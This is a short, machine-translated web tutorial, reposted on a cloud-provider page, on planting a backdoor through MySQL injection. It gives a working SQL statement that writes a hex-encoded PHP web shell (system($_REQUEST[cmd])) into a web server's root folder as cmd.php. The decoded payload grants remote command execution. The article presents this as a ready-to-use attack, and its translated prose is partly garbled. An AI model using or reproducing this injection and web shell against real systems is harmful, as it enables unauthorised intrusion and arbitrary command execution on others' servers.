Use Mysql statements to generate a backdoor Trojan

Source: Internet
Author: User

The following article describes how to generate a backdoor Trojan using MySQL statements (the best combination with PHP! The following article describes how to generate a backdoor Trojan using Mysql statements using the relevant code.

 
 
  1. SELECT * FROM `vbb_strikes` WHERE 1 union select 2,
    3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E 
    from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php' 

Run the above MySQL statement in phpmyadmin by injecting Mysql (the best combination with PHP), and then generate cmd under C:/inetpub/wwwroot. php file, the content is the original vbb_strikes content, followed:

 
 
  1. 2 3 <?php system($_REQUEST[cmd]);?> 

You can execute the system doscommand!

Which sort is what?

Is <? Php system ($ _ REQUEST [cmd]);?> If you do not use this method, other encodings may appear in different SQL versions, such as % xx. Which backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] key to connect the hex in it!


The above content is an introduction to the method for generating Backdoor trojans using Mysql statements. I hope you will gain some benefits.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.